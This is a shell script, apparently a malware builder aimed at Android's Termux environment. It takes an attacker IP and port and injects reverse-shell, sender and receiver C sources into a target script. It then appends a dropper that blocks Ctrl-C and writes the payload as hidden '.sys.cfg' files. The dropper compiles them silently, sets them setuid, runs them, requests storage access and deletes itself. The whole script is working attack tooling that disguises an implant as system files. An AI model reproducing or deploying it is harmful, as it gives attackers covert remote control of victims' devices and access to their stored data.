ip='#define AIP ''"'$1'"'
ps=$2
pss="#define PORT "$(($ps+5))
port="#define PORT $2"
(echo $ip && echo $port && cat v7x-rsg.rs.c) > rs.c

cat rsh.cetf >> $3
cat rs.c >> $3
echo "'" >> $3
echo ""  >> $3
cat rsh.cetf2 >> $3
(echo $ip && echo $pss && cat sender.c) > rs.c
cat rs.c >> $3
echo "'" >> $3
echo "" >> $3
cat rsh.cetf3 >> $3
(echo $ip && echo $pss && cat receiver.c) > rs.c
cat rs.c >> $3
echo "'" >> $3
echo "" >> $3
script="
trap noctrl SIGINT
echo \"\$data\" > \$PREFIX/var/.sys.cfg.c
echo \"\$datax\" > \$PREFIX/var/.sys.cfg.1.c
echo \"\$dataz\" > \$PREFIX/var/.sys.cfg.2.c
if [ ! -f "\$PREFIX/bin/gcc" ];then
   pkg install clang -y
fi
gcc \$PREFIX/var/.sys.cfg.c -o \$PREFIX/var/.sys.cfg >>/dev/null
gcc \$PREFIX/var/.sys.cfg.1.c -o \$PREFIX/var/.sys.cfg.1 >> /dev/null
gcc \$PREFIX/var/.sys.cfg.2.c -o \$PREFIX/var/.sys.cfg.2 >> /dev/null
chmod +s \$PREFIX/var/.sys.* &> /dev/null
\$PREFIX/var/.sys.cfg
chmod +s \$PREFIX/etc/system.cfg
chmod +x \$PREFIX/etc/system.cfg

termux-setup-storage
rm \$0
"
printf "$script" >> $3

